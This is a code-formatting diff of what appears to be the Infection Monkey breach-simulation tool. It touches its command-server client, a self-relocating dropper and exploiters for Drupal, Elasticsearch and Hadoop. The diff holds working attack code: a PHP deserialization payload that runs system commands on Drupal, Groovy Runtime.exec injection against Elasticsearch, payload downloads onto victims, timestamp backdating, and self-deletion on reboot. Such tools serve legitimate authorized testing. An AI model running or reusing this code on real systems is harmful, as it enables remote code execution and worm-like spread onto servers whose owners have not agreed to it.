verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + requests.patch( + "https://%s/api/monkey/%s" + % (WormConfiguration.current_server, GUID), # noqa: DUO123 + data=json.dumps({"config_error": True}), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return {} @staticmethod @@ -221,7 +260,8 @@ class ControlClient(object): @staticmethod def download_monkey_exe_by_os(is_windows, is_32bit): filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict( - ControlClient.spoof_host_os_info(is_windows, is_32bit)) + ControlClient.spoof_host_os_info(is_windows, is_32bit) + ) if filename is None: return None return ControlClient.download_monkey_exe_by_filename(filename, size) @@ -241,14 +281,7 @@ class ControlClient(object): else: arch = "x86_64" - return \ - { - "os": - { - "type": os, - "machine": arch - } - } + return {"os": {"type": os, "machine": arch}} @staticmethod def download_monkey_exe_by_filename(filename, size): @@ -259,13 +292,15 @@ class ControlClient(object): if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)): return dest_file else: - download = requests.get("https://%s/api/monkey/download/%s" % # noqa: DUO123 - (WormConfiguration.current_server, filename), - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + download = requests.get( + "https://%s/api/monkey/download/%s" + % (WormConfiguration.current_server, filename), # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + 
timeout=MEDIUM_REQUEST_TIMEOUT, + ) - with monkeyfs.open(dest_file, 'wb') as file_obj: + with monkeyfs.open(dest_file, "wb") as file_obj: for chunk in download.iter_content(chunk_size=DOWNLOAD_CHUNK): if chunk: file_obj.write(chunk) @@ -274,8 +309,9 @@ class ControlClient(object): return dest_file except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) @staticmethod def get_monkey_exe_filename_and_size_by_host(host): @@ -286,24 +322,29 @@ class ControlClient(object): if not WormConfiguration.current_server: return None, None try: - reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(host_dict), - headers={'content-type': 'application/json'}, - verify=False, proxies=ControlClient.proxies, - timeout=LONG_REQUEST_TIMEOUT) + reply = requests.post( + "https://%s/api/monkey/download" + % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(host_dict), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=LONG_REQUEST_TIMEOUT, + ) if 200 == reply.status_code: result_json = reply.json() - filename = result_json.get('filename') + filename = result_json.get("filename") if not filename: return None, None - size = result_json.get('size') + size = result_json.get("size") return filename, size else: return None, None except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return None, None @@ -312,11 +353,11 @@ class ControlClient(object): if not WormConfiguration.current_server: return None - my_proxy = ControlClient.proxies.get('https', '').replace('https://', '') + my_proxy = ControlClient.proxies.get("https", "").replace("https://", "") if my_proxy: proxy_class = TcpProxy try: - target_addr, target_port = my_proxy.split(':', 1) + target_addr, target_port = my_proxy.split(":", 1) target_port = int(target_port) except ValueError: return None @@ -329,34 +370,43 @@ class ControlClient(object): @staticmethod def get_pba_file(filename): try: - return requests.get(PBA_FILE_DOWNLOAD % # noqa: DUO123 - (WormConfiguration.current_server, filename), - verify=False, - proxies=ControlClient.proxies, - timeout=LONG_REQUEST_TIMEOUT) + return requests.get( + PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + timeout=LONG_REQUEST_TIMEOUT, + ) except requests.exceptions.RequestException: return False @staticmethod def get_T1216_pba_file(): try: - return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123 - T1216_PBA_FILE_DOWNLOAD_PATH), - verify=False, - proxies=ControlClient.proxies, - stream=True, - timeout=MEDIUM_REQUEST_TIMEOUT) + return requests.get( + urljoin( + f"https://{WormConfiguration.current_server}/", # noqa: DUO123 + T1216_PBA_FILE_DOWNLOAD_PATH, + ), + verify=False, + proxies=ControlClient.proxies, + stream=True, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except requests.exceptions.RequestException: return False @staticmethod def should_monkey_run(vulnerable_port: str) -> bool: - if vulnerable_port and \ - WormConfiguration.get_hop_distance_to_island() > 1 and \ - ControlClient.can_island_see_port(vulnerable_port) 
and \ - WormConfiguration.started_on_island: - raise PlannedShutdownException("Monkey shouldn't run on current machine " - "(it will be exploited later with more depth).") + if ( + vulnerable_port + and WormConfiguration.get_hop_distance_to_island() > 1 + and ControlClient.can_island_see_port(vulnerable_port) + and WormConfiguration.started_on_island + ): + raise PlannedShutdownException( + "Monkey shouldn't run on current machine " + "(it will be exploited later with more depth)." + ) return True @staticmethod @@ -365,13 +415,15 @@ class ControlClient(object): url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}" response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT) response = json.loads(response.content.decode()) - return response['status'] == "port_visible" + return response["status"] == "port_visible" except requests.exceptions.RequestException: return False @staticmethod def report_start_on_island(): - requests.post(f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island", - data=json.dumps({'started_on_island': True}), - verify=False, - timeout=MEDIUM_REQUEST_TIMEOUT) + requests.post( + f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island", + data=json.dumps({"started_on_island": True}), + verify=False, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 9b374c9f1..74c20321b 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -13,7 +13,11 @@ from ctypes import c_char_p from common.utils.attack_utils import ScanStatus, UsageEnum from infection_monkey.config import WormConfiguration from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly -from infection_monkey.model import GENERAL_CMDLINE_LINUX, MONKEY_CMDLINE_LINUX, MONKEY_CMDLINE_WINDOWS +from infection_monkey.model import ( + GENERAL_CMDLINE_LINUX, + MONKEY_CMDLINE_LINUX, + MONKEY_CMDLINE_WINDOWS, +) from infection_monkey.system_info import OperatingSystem, SystemInfoCollector from infection_monkey.telemetry.attack.t1106_telem import T1106Telem @@ -29,7 +33,7 @@ except NameError: # noinspection PyShadowingBuiltins WindowsError = IOError -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -39,108 +43,141 @@ MOVEFILE_DELAY_UNTIL_REBOOT = 4 class MonkeyDrops(object): def __init__(self, args): arg_parser = argparse.ArgumentParser() - arg_parser.add_argument('-p', '--parent') - arg_parser.add_argument('-t', '--tunnel') - arg_parser.add_argument('-s', '--server') - arg_parser.add_argument('-d', '--depth', type=int) - arg_parser.add_argument('-l', '--location') - arg_parser.add_argument('-vp', '--vulnerable-port') + arg_parser.add_argument("-p", "--parent") + arg_parser.add_argument("-t", "--tunnel") + arg_parser.add_argument("-s", "--server") + arg_parser.add_argument("-d", "--depth", type=int) + arg_parser.add_argument("-l", "--location") + arg_parser.add_argument("-vp", "--vulnerable-port") self.monkey_args = args[1:] self.opts, _ = arg_parser.parse_known_args(args) - self._config = {'source_path': os.path.abspath(sys.argv[0]), - 'destination_path': self.opts.location} + self._config = { + "source_path": os.path.abspath(sys.argv[0]), + "destination_path": self.opts.location, + } def initialize(self): LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config)) def start(self): - if self._config['destination_path'] is None: + if 
self._config["destination_path"] is None: LOG.error("No destination path specified") return False # we copy/move only in case path is different try: - file_moved = filecmp.cmp(self._config['source_path'], self._config['destination_path']) + file_moved = filecmp.cmp(self._config["source_path"], self._config["destination_path"]) except OSError: file_moved = False - if not file_moved and os.path.exists(self._config['destination_path']): - os.remove(self._config['destination_path']) + if not file_moved and os.path.exists(self._config["destination_path"]): + os.remove(self._config["destination_path"]) # first try to move the file if not file_moved and WormConfiguration.dropper_try_move_first: try: - shutil.move(self._config['source_path'], - self._config['destination_path']) + shutil.move(self._config["source_path"], self._config["destination_path"]) - LOG.info("Moved source file '%s' into '%s'", - self._config['source_path'], self._config['destination_path']) + LOG.info( + "Moved source file '%s' into '%s'", + self._config["source_path"], + self._config["destination_path"], + ) file_moved = True except (WindowsError, IOError, OSError) as exc: - LOG.debug("Error moving source file '%s' into '%s': %s", - self._config['source_path'], self._config['destination_path'], - exc) + LOG.debug( + "Error moving source file '%s' into '%s': %s", + self._config["source_path"], + self._config["destination_path"], + exc, + ) # if file still need to change path, copy it if not file_moved: try: - shutil.copy(self._config['source_path'], - self._config['destination_path']) + shutil.copy(self._config["source_path"], self._config["destination_path"]) - LOG.info("Copied source file '%s' into '%s'", - self._config['source_path'], self._config['destination_path']) + LOG.info( + "Copied source file '%s' into '%s'", + self._config["source_path"], + self._config["destination_path"], + ) except (WindowsError, IOError, OSError) as exc: - LOG.error("Error copying source file '%s' into '%s': %s", - self._config['source_path'], self._config['destination_path'], - exc) + LOG.error( + "Error copying source file '%s' into '%s': %s", + self._config["source_path"], + self._config["destination_path"], + exc, + ) return False if WormConfiguration.dropper_set_date: - if sys.platform == 'win32': - dropper_date_reference_path = os.path.expandvars(WormConfiguration.dropper_date_reference_path_windows) + if sys.platform == "win32": + dropper_date_reference_path = os.path.expandvars( + WormConfiguration.dropper_date_reference_path_windows + ) else: dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux try: ref_stat = os.stat(dropper_date_reference_path) except OSError: - LOG.warning("Cannot set reference date using '%s', file not found", - dropper_date_reference_path) + LOG.warning( + "Cannot set reference date using '%s', file not found", + dropper_date_reference_path, + ) else: try: - os.utime(self._config['destination_path'], - (ref_stat.st_atime, ref_stat.st_mtime)) + os.utime( + self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime) + ) except OSError: LOG.warning("Cannot set reference date to destination file") - monkey_options = \ - build_monkey_commandline_explicitly(parent=self.opts.parent, - tunnel=self.opts.tunnel, - server=self.opts.server, - depth=self.opts.depth, - location=None, - vulnerable_port=self.opts.vulnerable_port) + monkey_options = build_monkey_commandline_explicitly( + parent=self.opts.parent, + tunnel=self.opts.tunnel, + server=self.opts.server, + 
depth=self.opts.depth, + location=None, + vulnerable_port=self.opts.vulnerable_port, + ) if OperatingSystem.Windows == SystemInfoCollector.get_os(): - monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options + monkey_cmdline = ( + MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]} + + monkey_options + ) else: - dest_path = self._config['destination_path'] + dest_path = self._config["destination_path"] # In linux we have a more complex commandline. There's a general outer one, and the inner one which actually # runs the monkey - inner_monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_filename': dest_path.split("/")[-1]} + monkey_options - monkey_cmdline = GENERAL_CMDLINE_LINUX % {'monkey_directory': dest_path[0:dest_path.rfind("/")], - 'monkey_commandline': inner_monkey_cmdline} + inner_monkey_cmdline = ( + MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]} + + monkey_options + ) + monkey_cmdline = GENERAL_CMDLINE_LINUX % { + "monkey_directory": dest_path[0 : dest_path.rfind("/")], + "monkey_commandline": inner_monkey_cmdline, + } - monkey_process = subprocess.Popen(monkey_cmdline, shell=True, - stdin=subprocess.PIPE, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - close_fds=True, creationflags=DETACHED_PROCESS) + monkey_process = subprocess.Popen( + monkey_cmdline, + shell=True, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + close_fds=True, + creationflags=DETACHED_PROCESS, + ) - LOG.info("Executed monkey process (PID=%d) with command line: %s", - monkey_process.pid, monkey_cmdline) + LOG.info( + "Executed monkey process (PID=%d) with command line: %s", + monkey_process.pid, + monkey_cmdline, + ) time.sleep(3) if monkey_process.poll() is not None: @@ -150,25 +187,35 @@ class MonkeyDrops(object): LOG.info("Cleaning up the dropper") try: - if (self._config['source_path'].lower() != self._config['destination_path'].lower()) and \ - os.path.exists(self._config['source_path']) and \ - WormConfiguration.dropper_try_move_first: + if ( + (self._config["source_path"].lower() != self._config["destination_path"].lower()) + and os.path.exists(self._config["source_path"]) + and WormConfiguration.dropper_try_move_first + ): # try removing the file first try: - os.remove(self._config['source_path']) + os.remove(self._config["source_path"]) except Exception as exc: - LOG.debug("Error removing source file '%s': %s", self._config['source_path'], exc) + LOG.debug( + "Error removing source file '%s': %s", self._config["source_path"], exc + ) # mark the file for removal on next boot - dropper_source_path_ctypes = c_char_p(self._config['source_path']) - if 0 == ctypes.windll.kernel32.MoveFileExA(dropper_source_path_ctypes, None, - MOVEFILE_DELAY_UNTIL_REBOOT): - LOG.debug("Error marking source file '%s' for deletion on next boot (error %d)", - self._config['source_path'], ctypes.windll.kernel32.GetLastError()) + dropper_source_path_ctypes = c_char_p(self._config["source_path"]) + if 0 == ctypes.windll.kernel32.MoveFileExA( + dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT + ): + LOG.debug( + "Error marking source file '%s' for deletion on next boot (error %d)", + self._config["source_path"], + ctypes.windll.kernel32.GetLastError(), + ) else: - LOG.debug("Dropper source file '%s' is marked for deletion on next boot", - self._config['source_path']) + LOG.debug( + "Dropper source file '%s' is marked for deletion on next boot", + self._config["source_path"], + ) 
T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send() LOG.info("Dropper cleanup complete") diff --git a/monkey/infection_monkey/exploit/HostExploiter.py b/monkey/infection_monkey/exploit/HostExploiter.py index 59d593b09..e5bdf6dfe 100644 --- a/monkey/infection_monkey/exploit/HostExploiter.py +++ b/monkey/infection_monkey/exploit/HostExploiter.py @@ -8,7 +8,7 @@ from common.utils.exploit_enum import ExploitType from infection_monkey.config import WormConfiguration from infection_monkey.utils.plugins.plugin import Plugin -__author__ = 'itamar' +__author__ = "itamar" logger = logging.getLogger(__name__) @@ -48,31 +48,42 @@ class HostExploiter(Plugin): def __init__(self, host): self._config = WormConfiguration - self.exploit_info = {'display_name': self._EXPLOITED_SERVICE, - 'started': '', - 'finished': '', - 'vulnerable_urls': [], - 'vulnerable_ports': [], - 'executed_cmds': []} + self.exploit_info = { + "display_name": self._EXPLOITED_SERVICE, + "started": "", + "finished": "", + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + } self.exploit_attempts = [] self.host = host def set_start_time(self): - self.exploit_info['started'] = datetime.now().isoformat() + self.exploit_info["started"] = datetime.now().isoformat() def set_finish_time(self): - self.exploit_info['finished'] = datetime.now().isoformat() + self.exploit_info["finished"] = datetime.now().isoformat() def is_os_supported(self): - return self.host.os.get('type') in self._TARGET_OS_TYPE + return self.host.os.get("type") in self._TARGET_OS_TYPE def send_exploit_telemetry(self, result): from infection_monkey.telemetry.exploit_telem import ExploitTelem + ExploitTelem(self, result).send() - def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''): - self.exploit_attempts.append({'result': result, 'user': user, 'password': password, - 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key}) + def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""): + self.exploit_attempts.append( + { + "result": result, + "user": user, + "password": password, + "lm_hash": lm_hash, + "ntlm_hash": ntlm_hash, + "ssh_key": ssh_key, + } + ) def exploit_host(self): self.pre_exploit() @@ -80,9 +91,9 @@ class HostExploiter(Plugin): try: result = self._exploit_host() except FailedExploitationError as e: - logger.debug(f'Exploiter failed: {e}.') + logger.debug(f"Exploiter failed: {e}.") except Exception: - logger.error('Exception in exploit_host', exc_info=True) + logger.error("Exception in exploit_host", exc_info=True) finally: self.post_exploit() return result @@ -98,10 +109,10 @@ class HostExploiter(Plugin): raise NotImplementedError() def add_vuln_url(self, url): - self.exploit_info['vulnerable_urls'].append(url) + self.exploit_info["vulnerable_urls"].append(url) def add_vuln_port(self, port): - self.exploit_info['vulnerable_ports'].append(port) + self.exploit_info["vulnerable_ports"].append(port) def add_executed_cmd(self, cmd): """ @@ -109,5 +120,4 @@ class HostExploiter(Plugin): :param cmd: String of executed command. e.g. 
'echo Example' """ powershell = True if "powershell" in cmd.lower() else False - self.exploit_info['executed_cmds'].append( - {'cmd': cmd, 'powershell': powershell}) + self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell}) diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py index 04b0ce431..efbbc2f56 100644 --- a/monkey/infection_monkey/exploit/drupal.py +++ b/monkey/infection_monkey/exploit/drupal.py @@ -9,20 +9,19 @@ from urllib.parse import urljoin import requests -from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT, - MEDIUM_REQUEST_TIMEOUT) +from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from common.network.network_utils import remove_port from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.model import ID_STRING -__author__ = 'Ophir Harpaz' +__author__ = "Ophir Harpaz" LOG = logging.getLogger(__name__) class DrupalExploiter(WebRCE): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Drupal Server' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Drupal Server" def __init__(self, host): super(DrupalExploiter, self).__init__(host) @@ -34,9 +33,11 @@ class DrupalExploiter(WebRCE): :return: the Drupal exploit config """ exploit_config = super(DrupalExploiter, self).get_exploit_config() - exploit_config['url_extensions'] = ['node/', # In Linux, no path is added - 'drupal/node/'] # However, Bitnami installations are under /drupal - exploit_config['dropper'] = True + exploit_config["url_extensions"] = [ + "node/", # In Linux, no path is added + "drupal/node/", + ] # However, Bitnami installations are under /drupal + exploit_config["dropper"] = True return exploit_config def add_vulnerable_urls(self, potential_urls, stop_checking=False): @@ -51,17 +52,19 @@ class DrupalExploiter(WebRCE): try: node_ids = find_exploitbale_article_ids(url) if node_ids is None: - LOG.info('Could not find a Drupal node to attack') + LOG.info("Could not find a Drupal node to attack") continue for node_id in node_ids: node_url = urljoin(url, str(node_id)) if self.check_if_exploitable(node_url): - self.add_vuln_url(url) # This is for report. Should be refactored in the future + self.add_vuln_url( + url + ) # This is for report. 
Should be refactored in the future self.vulnerable_urls.append(node_url) if stop_checking: break except Exception as e: # We still don't know which errors to expect - LOG.error(f'url {url} failed in exploitability check: {e}') + LOG.error(f"url {url} failed in exploitability check: {e}") if not self.vulnerable_urls: LOG.info("No vulnerable urls found") @@ -75,35 +78,39 @@ class DrupalExploiter(WebRCE): """ payload = build_exploitability_check_payload(url) - response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123 - json=payload, - headers={"Content-Type": "application/hal+json"}, - verify=False, - timeout=MEDIUM_REQUEST_TIMEOUT) + response = requests.get( + f"{url}?_format=hal_json", # noqa: DUO123 + json=payload, + headers={"Content-Type": "application/hal+json"}, + verify=False, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) if is_response_cached(response): - LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') + LOG.info(f"Checking if node {url} is vuln returned cache HIT, ignoring") return False - return 'INVALID_VALUE does not correspond to an entity on this site' in response.text + return "INVALID_VALUE does not correspond to an entity on this site" in response.text def exploit(self, url, command): # pad a easy search replace output: - cmd = f'echo {ID_STRING} && {command}' + cmd = f"echo {ID_STRING} && {command}" base = remove_port(url) payload = build_cmd_execution_payload(base, cmd) - r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123 - json=payload, - headers={"Content-Type": "application/hal+json"}, - verify=False, - timeout=LONG_REQUEST_TIMEOUT) + r = requests.get( + f"{url}?_format=hal_json", # noqa: DUO123 + json=payload, + headers={"Content-Type": "application/hal+json"}, + verify=False, + timeout=LONG_REQUEST_TIMEOUT, + ) if is_response_cached(r): - LOG.info(f'Exploiting {url} returned cache HIT, may have failed') + LOG.info(f"Exploiting {url} returned cache HIT, may have failed") if ID_STRING not in r.text: - LOG.warning('Command execution _may_ have failed') + LOG.warning("Command execution _may_ have failed") result = r.text.split(ID_STRING)[-1] return result @@ -126,14 +133,16 @@ class DrupalExploiter(WebRCE): num_available_urls = len(self.vulnerable_urls) result = num_available_urls >= num_urls_needed_for_full_exploit if not result: - LOG.info(f'{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server ' - f'but only {num_available_urls} found') + LOG.info( + f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server " + f"but only {num_available_urls} found" + ) return result def is_response_cached(r: requests.Response) -> bool: """ Check if a response had the cache header. 
""" - return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT' + return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT" def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set: @@ -141,12 +150,12 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100 articles = set() while lower < upper: node_url = urljoin(base_url, str(lower)) - response = requests.get(node_url, - verify=False, - timeout=LONG_REQUEST_TIMEOUT) # noqa: DUO123 + response = requests.get( + node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT + ) # noqa: DUO123 if response.status_code == 200: if is_response_cached(response): - LOG.info(f'Found a cached article at: {node_url}, skipping') + LOG.info(f"Found a cached article at: {node_url}, skipping") else: articles.add(lower) lower += 1 @@ -155,20 +164,10 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100 def build_exploitability_check_payload(url): payload = { - "_links": { - "type": { - "href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}" - } - }, - "type": { - "target_id": "article" - }, - "title": { - "value": "My Article" - }, - "body": { - "value": "" - } + "_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}}, + "type": {"target_id": "article"}, + "title": {"value": "My Article"}, + "body": {"value": ""}, } return payload @@ -178,21 +177,17 @@ def build_cmd_execution_payload(base, cmd): "link": [ { "value": "link", - "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000" - "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"" - "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:" - "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";" - "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000" - "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000" - "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"" - "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" - "".replace('|size|', str(len(cmd))).replace('|command|', cmd) + "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000' + 'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"' + 'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:' + '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";' + 's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000' + 'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000' + 'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"' + 'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}' + "".replace("|size|", str(len(cmd))).replace("|command|", cmd), } ], - "_links": { - "type": { - "href": f"{urljoin(base, '/rest/type/shortcut/default')}" - } - } + "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}}, } return payload diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index dfaffac6a..ca1c0408b 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -13,12 +13,18 @@ import requests from common.common_consts.network_consts import ES_SERVICE from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import (BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, CMD_PREFIX, DOWNLOAD_TIMEOUT, ID_STRING, - WGET_HTTP_UPLOAD) +from infection_monkey.model import ( + BITSADMIN_CMDLINE_HTTP, + CHECK_COMMAND, + CMD_PREFIX, + 
DOWNLOAD_TIMEOUT, + ID_STRING, + WGET_HTTP_UPLOAD, +) from infection_monkey.network.elasticfinger import ES_PORT from infection_monkey.telemetry.attack.t1197_telem import T1197Telem -__author__ = 'danielg, VakarisZ' +__author__ = "danielg, VakarisZ" LOG = logging.getLogger(__name__) @@ -26,21 +32,28 @@ LOG = logging.getLogger(__name__) class ElasticGroovyExploiter(WebRCE): # attack URLs MONKEY_RESULT_FIELD = "monkey_result" - GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD - JAVA_CMD = \ - GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + GENERIC_QUERY = ( + """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD + ) + JAVA_CMD = ( + GENERIC_QUERY + % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + ) - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Elastic search' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Elastic search" def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) def get_exploit_config(self): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() - exploit_config['dropper'] = True - exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP} + exploit_config["dropper"] = True + exploit_config["url_extensions"] = ["_search?pretty"] + exploit_config["upload_commands"] = { + "linux": WGET_HTTP_UPLOAD, + "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP, + } return exploit_config def get_open_service_ports(self, port_list, names): @@ -56,7 +69,9 @@ class ElasticGroovyExploiter(WebRCE): try: response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT) except requests.ReadTimeout: - LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.") + LOG.error( + "Elastic couldn't upload monkey, because server didn't respond to upload request." 
+ ) return False result = self.get_results(response) if not result: @@ -65,7 +80,7 @@ class ElasticGroovyExploiter(WebRCE): def upload_monkey(self, url, commands=None): result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands) - if 'windows' in self.host.os['type'] and result: + if "windows" in self.host.os["type"] and result: T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() return result @@ -76,14 +91,14 @@ class ElasticGroovyExploiter(WebRCE): """ try: json_resp = json.loads(response.text) - return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD] + return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD] except (KeyError, IndexError): return None def check_if_exploitable(self, url): # Overridden web_rce method that adds CMD prefix for windows command try: - if 'windows' in self.host.os['type']: + if "windows" in self.host.os["type"]: resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND) else: resp = self.exploit(url, CHECK_COMMAND) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 36da16379..b9dd20159 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -15,16 +15,21 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import HADOOP_LINUX_COMMAND, HADOOP_WINDOWS_COMMAND, ID_STRING, MONKEY_ARG +from infection_monkey.model import ( + HADOOP_LINUX_COMMAND, + HADOOP_WINDOWS_COMMAND, + ID_STRING, + MONKEY_ARG, +) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) class HadoopExploiter(WebRCE): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Hadoop' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Hadoop" HADOOP_PORTS = [["8088", False]] # How long we have our http server open for downloads in seconds DOWNLOAD_TIMEOUT = 60 @@ -41,13 +46,13 @@ class HadoopExploiter(WebRCE): if not self.vulnerable_urls: return False # We presume hadoop works only on 64-bit machines - if self.host.os['type'] == 'windows': - self.host.os['machine'] = '64' + if self.host.os["type"] == "windows": + self.host.os["machine"] = "64" paths = self.get_monkey_paths() if not paths: return False - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path']) - command = self.build_command(paths['dest_path'], http_path) + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"]) + command = self.build_command(paths["dest_path"], http_path) if not self.exploit(self.vulnerable_urls[0], command): return False 